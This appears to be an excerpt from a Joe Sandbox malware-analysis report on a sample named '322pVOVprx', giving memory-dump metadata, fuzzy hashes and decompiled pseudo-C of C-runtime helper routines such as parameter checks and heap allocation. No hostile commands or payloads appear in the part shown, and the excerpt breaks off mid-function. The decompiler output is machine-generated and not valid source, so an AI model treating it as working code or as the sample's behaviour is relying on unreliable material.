                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                                        • Opcode ID: e9a7e304643df4a79f5f92f113a909c0855d61e5f1cd2648997e34e72053eb35
                                                                                                                                                                                                                                                        • Instruction ID: cfe9d90c9c34c34ac467feaa9a2d9d89b71b723d15f3e82e2514b024198aa7e9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9a7e304643df4a79f5f92f113a909c0855d61e5f1cd2648997e34e72053eb35
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47216B32F0460689EB24DF68D4603BC3BA0FF14B58F15563AD62C8AAD5DF39D944CB85
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC54C8(intOrPtr __ebp, long long __rbx, short* __rcx, long long __rdx, long long __rbp, void* __r8, long long __r9, char _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                                        				long long _v48;
                                                                                                                                                                                                                                                        				long long _v56;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                                                                        				signed long long _t80;
                                                                                                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                                                                                                        				intOrPtr _t86;
                                                                                                                                                                                                                                                        				long long _t89;
                                                                                                                                                                                                                                                        				signed long long _t97;
                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                        				signed long long _t99;
                                                                                                                                                                                                                                                        				short* _t105;
                                                                                                                                                                                                                                                        				long long _t106;
                                                                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                                                                        				signed long long _t111;
                                                                                                                                                                                                                                                        				intOrPtr* _t117;
                                                                                                                                                                                                                                                        				long long _t125;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				r8d = 0x40;
                                                                                                                                                                                                                                                        				goto 0xe5ac53fc;
                                                                                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                                                                                        				_t80 = _t111;
                                                                                                                                                                                                                                                        				 *((long long*)(_t80 + 0x10)) = __rdx;
                                                                                                                                                                                                                                                        				_push(_t98);
                                                                                                                                                                                                                                                        				 *((long long*)(_t80 - 0x28)) = 0xfffffffe;
                                                                                                                                                                                                                                                        				 *((long long*)(_t80 + 0x18)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t80 + 0x20)) = __rbp;
                                                                                                                                                                                                                                                        				_t89 = __r9;
                                                                                                                                                                                                                                                        				_t109 = __r8;
                                                                                                                                                                                                                                                        				_t105 = __rcx;
                                                                                                                                                                                                                                                        				r14d = 0;
                                                                                                                                                                                                                                                        				_t56 = r14d;
                                                                                                                                                                                                                                                        				if (__rcx == 0) goto 0xe5ac5517;
                                                                                                                                                                                                                                                        				if (__r8 != 0) goto 0xe5ac5513;
                                                                                                                                                                                                                                                        				goto 0xe5ac56bc;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx)) = r14w;
                                                                                                                                                                                                                                                        				if (__rdx != 0) goto 0xe5ac5549;
                                                                                                                                                                                                                                                        				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				_v48 = __r9;
                                                                                                                                                                                                                                                        				_v56 = _t125;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4(_t80, __r9, __rcx, __rdx, __rcx, __r8, __r8);
                                                                                                                                                                                                                                                        				goto 0xe5ac56bc;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__r9 + 0x28)) != r14b) goto 0xe5ac555c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3A20(_t80 | 0xffffffff, __r9, __r9, _t105, _t125);
                                                                                                                                                                                                                                                        				_t82 =  *((intOrPtr*)(__r9 + 0x18));
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t82 + 0xc)) != 0xfde9) goto 0xe5ac558f;
                                                                                                                                                                                                                                                        				_a8 = _t125;
                                                                                                                                                                                                                                                        				_v56 = __r9;
                                                                                                                                                                                                                                                        				_t97 =  &_a16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACF57C(_t82, __r9, _t105, _t97, _t109,  &_a8);
                                                                                                                                                                                                                                                        				goto 0xe5ac56bc;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac5671;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t82 + 0x138)) != 0) goto 0xe5ac55ca;
                                                                                                                                                                                                                                                        				if (_t109 == 0) goto 0xe5ac55c2;
                                                                                                                                                                                                                                                        				 *_t105 =  *(_t98 + _t97) & 0x000000ff;
                                                                                                                                                                                                                                                        				if ( *(_t98 + _t97) == r14b) goto 0xe5ac55c2;
                                                                                                                                                                                                                                                        				_t99 = _t98 + 1;
                                                                                                                                                                                                                                                        				_t106 = _t105 + 2;
                                                                                                                                                                                                                                                        				if (_t99 - _t109 < 0) goto 0xe5ac55a9;
                                                                                                                                                                                                                                                        				goto 0xe5ac56bc;
                                                                                                                                                                                                                                                        				_v48 = __ebp;
                                                                                                                                                                                                                                                        				_v56 = _t106;
                                                                                                                                                                                                                                                        				r9d = _t56;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACE7F0();
                                                                                                                                                                                                                                                        				if (_t99 != 0) goto 0xe5ac56b9;
                                                                                                                                                                                                                                                        				if (GetLastError() == 0x7a) goto 0xe5ac560c;
                                                                                                                                                                                                                                                        				 *((char*)(_t89 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t89 + 0x2c)) = 0x2a;
                                                                                                                                                                                                                                                        				 *_t106 = r14w;
                                                                                                                                                                                                                                                        				goto 0xe5ac55c2;
                                                                                                                                                                                                                                                        				r9d = __ebp;
                                                                                                                                                                                                                                                        				_t117 = _a16;
                                                                                                                                                                                                                                                        				if (__ebp == 0) goto 0xe5ac5645;
                                                                                                                                                                                                                                                        				r9d = r9d - 1;
                                                                                                                                                                                                                                                        				if ( *_t117 == r14b) goto 0xe5ac5645;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 0x18)))) + _t97 * 2)) - r14w >= 0) goto 0xe5ac563d;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t117 + 1)) == r14b) goto 0xe5ac55fb;
                                                                                                                                                                                                                                                        				goto 0xe5ac5619;
                                                                                                                                                                                                                                                        				r8d = r8d - r10d;
                                                                                                                                                                                                                                                        				_t86 =  *((intOrPtr*)(_t89 + 0x18));
                                                                                                                                                                                                                                                        				_v48 = __ebp;
                                                                                                                                                                                                                                                        				_v56 = _t106;
                                                                                                                                                                                                                                                        				r9d = r8d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACE7F0();
                                                                                                                                                                                                                                                        				if (_t86 != 0) goto 0xe5ac56bc;
                                                                                                                                                                                                                                                        				goto 0xe5ac55fb;
                                                                                                                                                                                                                                                        				if (_t86 != 0) goto 0xe5ac5688;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t97 + (_t99 | 0xffffffffffffffff) + 1)) != r14b) goto 0xe5ac567a;
                                                                                                                                                                                                                                                        				goto 0xe5ac55c2;
                                                                                                                                                                                                                                                        				_v48 = r14d;
                                                                                                                                                                                                                                                        				_v56 = _t125;
                                                                                                                                                                                                                                                        				r9d = _t56;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACE7F0();
                                                                                                                                                                                                                                                        				if (_t86 != 0) goto 0xe5ac56b9;
                                                                                                                                                                                                                                                        				 *((char*)(_t89 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t89 + 0x2c)) = 0x2a;
                                                                                                                                                                                                                                                        				goto 0xe5ac55c2;
                                                                                                                                                                                                                                                        				return _t86;
                                                                                                                                                                                                                                                        			}




















                                                                                                                                                                                                                                                        0x7ff6e5ac54c8
                                                                                                                                                                                                                                                        0x7ff6e5ac54ce
                                                                                                                                                                                                                                                        0x7ff6e5ac54d3
                                                                                                                                                                                                                                                        0x7ff6e5ac54d4
                                                                                                                                                                                                                                                        0x7ff6e5ac54d7
                                                                                                                                                                                                                                                        0x7ff6e5ac54dc
                                                                                                                                                                                                                                                        0x7ff6e5ac54e3
                                                                                                                                                                                                                                                        0x7ff6e5ac54eb
                                                                                                                                                                                                                                                        0x7ff6e5ac54ef
                                                                                                                                                                                                                                                        0x7ff6e5ac54f3
                                                                                                                                                                                                                                                        0x7ff6e5ac54f6
                                                                                                                                                                                                                                                        0x7ff6e5ac54f9
                                                                                                                                                                                                                                                        0x7ff6e5ac54fc
                                                                                                                                                                                                                                                        0x7ff6e5ac54ff
                                                                                                                                                                                                                                                        0x7ff6e5ac5505
                                                                                                                                                                                                                                                        0x7ff6e5ac550a
                                                                                                                                                                                                                                                        0x7ff6e5ac550e
                                                                                                                                                                                                                                                        0x7ff6e5ac5513
                                                                                                                                                                                                                                                        0x7ff6e5ac551a
                                                                                                                                                                                                                                                        0x7ff6e5ac551c
                                                                                                                                                                                                                                                        0x7ff6e5ac5521
                                                                                                                                                                                                                                                        0x7ff6e5ac5529
                                                                                                                                                                                                                                                        0x7ff6e5ac552e
                                                                                                                                                                                                                                                        0x7ff6e5ac5533
                                                                                                                                                                                                                                                        0x7ff6e5ac5536
                                                                                                                                                                                                                                                        0x7ff6e5ac553b
                                                                                                                                                                                                                                                        0x7ff6e5ac5544
                                                                                                                                                                                                                                                        0x7ff6e5ac554d
                                                                                                                                                                                                                                                        0x7ff6e5ac5552
                                                                                                                                                                                                                                                        0x7ff6e5ac555c
                                                                                                                                                                                                                                                        0x7ff6e5ac5569
                                                                                                                                                                                                                                                        0x7ff6e5ac556b
                                                                                                                                                                                                                                                        0x7ff6e5ac5570
                                                                                                                                                                                                                                                        0x7ff6e5ac557d
                                                                                                                                                                                                                                                        0x7ff6e5ac5585
                                                                                                                                                                                                                                                        0x7ff6e5ac558a
                                                                                                                                                                                                                                                        0x7ff6e5ac5599
                                                                                                                                                                                                                                                        0x7ff6e5ac55a2
                                                                                                                                                                                                                                                        0x7ff6e5ac55a7
                                                                                                                                                                                                                                                        0x7ff6e5ac55ad
                                                                                                                                                                                                                                                        0x7ff6e5ac55b4
                                                                                                                                                                                                                                                        0x7ff6e5ac55b6
                                                                                                                                                                                                                                                        0x7ff6e5ac55b9
                                                                                                                                                                                                                                                        0x7ff6e5ac55c0
                                                                                                                                                                                                                                                        0x7ff6e5ac55c5
                                                                                                                                                                                                                                                        0x7ff6e5ac55ca
                                                                                                                                                                                                                                                        0x7ff6e5ac55ce
                                                                                                                                                                                                                                                        0x7ff6e5ac55d7
                                                                                                                                                                                                                                                        0x7ff6e5ac55e0
                                                                                                                                                                                                                                                        0x7ff6e5ac55ea
                                                                                                                                                                                                                                                        0x7ff6e5ac55f9
                                                                                                                                                                                                                                                        0x7ff6e5ac55fb
                                                                                                                                                                                                                                                        0x7ff6e5ac55ff
                                                                                                                                                                                                                                                        0x7ff6e5ac5606
                                                                                                                                                                                                                                                        0x7ff6e5ac560a
                                                                                                                                                                                                                                                        0x7ff6e5ac560c
                                                                                                                                                                                                                                                        0x7ff6e5ac5614
                                                                                                                                                                                                                                                        0x7ff6e5ac5619
                                                                                                                                                                                                                                                        0x7ff6e5ac561b
                                                                                                                                                                                                                                                        0x7ff6e5ac5621
                                                                                                                                                                                                                                                        0x7ff6e5ac5633
                                                                                                                                                                                                                                                        0x7ff6e5ac563b
                                                                                                                                                                                                                                                        0x7ff6e5ac5643
                                                                                                                                                                                                                                                        0x7ff6e5ac5645
                                                                                                                                                                                                                                                        0x7ff6e5ac5648
                                                                                                                                                                                                                                                        0x7ff6e5ac564c
                                                                                                                                                                                                                                                        0x7ff6e5ac5650
                                                                                                                                                                                                                                                        0x7ff6e5ac5655
                                                                                                                                                                                                                                                        0x7ff6e5ac5663
                                                                                                                                                                                                                                                        0x7ff6e5ac566d
                                                                                                                                                                                                                                                        0x7ff6e5ac566f
                                                                                                                                                                                                                                                        0x7ff6e5ac5678
                                                                                                                                                                                                                                                        0x7ff6e5ac5681
                                                                                                                                                                                                                                                        0x7ff6e5ac5683
                                                                                                                                                                                                                                                        0x7ff6e5ac5688
                                                                                                                                                                                                                                                        0x7ff6e5ac568d
                                                                                                                                                                                                                                                        0x7ff6e5ac5692
                                                                                                                                                                                                                                                        0x7ff6e5ac569d
                                                                                                                                                                                                                                                        0x7ff6e5ac56a7
                                                                                                                                                                                                                                                        0x7ff6e5ac56a9
                                                                                                                                                                                                                                                        0x7ff6e5ac56ad
                                                                                                                                                                                                                                                        0x7ff6e5ac56b4
                                                                                                                                                                                                                                                        0x7ff6e5ac56ce

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                                                                                        • Instruction ID: 02c0d2e114d0f7bd42005d3b6752b6d0e56c1894d0820791b2cd8c31c406925d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05116223B1C64181EB60AF599520379A2A1AF88F81F544075EB4DDB796DF3EDC00870A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD575C(intOrPtr* __rax, long long __rbx, long long _a8, intOrPtr _a40) {
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				if (_a40 != 0) goto 0xe5ad5791;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				 *__rax = 0x16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				return 0x16;
                                                                                                                                                                                                                                                        			}



                                                                                                                                                                                                                                                        0x7ff6e5ad575c
                                                                                                                                                                                                                                                        0x7ff6e5ad5771
                                                                                                                                                                                                                                                        0x7ff6e5ad5773
                                                                                                                                                                                                                                                        0x7ff6e5ad577d
                                                                                                                                                                                                                                                        0x7ff6e5ad577f
                                                                                                                                                                                                                                                        0x7ff6e5ad5790

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                                                                                                                                                                                                                        • Instruction ID: 5813e598e156f9a3d4e3ec5edea6a5fb5fb4b3936b3e87bcc2d47a0fc83ce0ae
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83213D33B1864187DB61AF1CE4A076976A0EF88F98F244234EA5DC76D9DF3ED8108B05
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ABF61C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32, intOrPtr _a40) {
                                                                                                                                                                                                                                                        				intOrPtr* _t19;
                                                                                                                                                                                                                                                        				intOrPtr* _t31;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t19 = _t31;
                                                                                                                                                                                                                                                        				 *((long long*)(_t19 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t19 + 0x10)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t19 + 0x18)) = __rdi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t19 + 0x20)) = __r14;
                                                                                                                                                                                                                                                        				if (__r8 == 0) goto 0xe5abf675;
                                                                                                                                                                                                                                                        				if (__r9 == 0) goto 0xe5abf675;
                                                                                                                                                                                                                                                        				if (_a40 != 0) goto 0xe5abf692;
                                                                                                                                                                                                                                                        				if (__rdx == 0xffffffff) goto 0xe5abf665;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t19);
                                                                                                                                                                                                                                                        				 *_t19 = 0x16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}





                                                                                                                                                                                                                                                        0x7ff6e5abf61c
                                                                                                                                                                                                                                                        0x7ff6e5abf61f
                                                                                                                                                                                                                                                        0x7ff6e5abf623
                                                                                                                                                                                                                                                        0x7ff6e5abf627
                                                                                                                                                                                                                                                        0x7ff6e5abf62b
                                                                                                                                                                                                                                                        0x7ff6e5abf644
                                                                                                                                                                                                                                                        0x7ff6e5abf649
                                                                                                                                                                                                                                                        0x7ff6e5abf653
                                                                                                                                                                                                                                                        0x7ff6e5abf659
                                                                                                                                                                                                                                                        0x7ff6e5abf660
                                                                                                                                                                                                                                                        0x7ff6e5abf665
                                                                                                                                                                                                                                                        0x7ff6e5abf66a
                                                                                                                                                                                                                                                        0x7ff6e5abf670
                                                                                                                                                                                                                                                        0x7ff6e5abf691

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                                                                                                        • Instruction ID: 76cad13922b269a4d31088a6580aa15e7450b72379cd0f96b5ae68d06a090d85
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D010823B0878640EA44EB5A9921279A695FF45FE0F0C8630DE6CD7BDACF3ED8014349
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC6B44(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __rsi;
                                                                                                                                                                                                                                                        				_a24 = __rdi;
                                                                                                                                                                                                                                                        				if (__ecx - 0x2000 < 0) goto 0xe5ac6b8c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				 *__rax = 9;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				return 9;
                                                                                                                                                                                                                                                        			}



                                                                                                                                                                                                                                                        0x7ff6e5ac6b44
                                                                                                                                                                                                                                                        0x7ff6e5ac6b49
                                                                                                                                                                                                                                                        0x7ff6e5ac6b4e
                                                                                                                                                                                                                                                        0x7ff6e5ac6b61
                                                                                                                                                                                                                                                        0x7ff6e5ac6b63
                                                                                                                                                                                                                                                        0x7ff6e5ac6b6d
                                                                                                                                                                                                                                                        0x7ff6e5ac6b6f
                                                                                                                                                                                                                                                        0x7ff6e5ac6b8b

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 93ffa9a445d8169bfee8bcb8cacf79cf401c8f4143666ad12cea5e18db9d0a30
                                                                                                                                                                                                                                                        • Instruction ID: 6faadc55322c77afbb0314e8ea826088b3e58b086461693444ef30325ddfa4d4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93ffa9a445d8169bfee8bcb8cacf79cf401c8f4143666ad12cea5e18db9d0a30
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82115533B5C64282E310DB1DE46026963A5EF84B40F290034EA5DDF696DF3EFC218B0A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACDD40(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t29 = __rdx;
                                                                                                                                                                                                                                                        				if (__rcx == 0) goto 0xe5acdd5f;
                                                                                                                                                                                                                                                        				_t1 = _t29 - 0x20; // -32
                                                                                                                                                                                                                                                        				_t22 = _t1;
                                                                                                                                                                                                                                                        				if (_t22 - __rdx < 0) goto 0xe5acdda2;
                                                                                                                                                                                                                                                        				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                                                                                                                                                                        				goto 0xe5acdd86;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC8AEC() == 0) goto 0xe5acdda2;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD26B0(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0xe5acdda2;
                                                                                                                                                                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
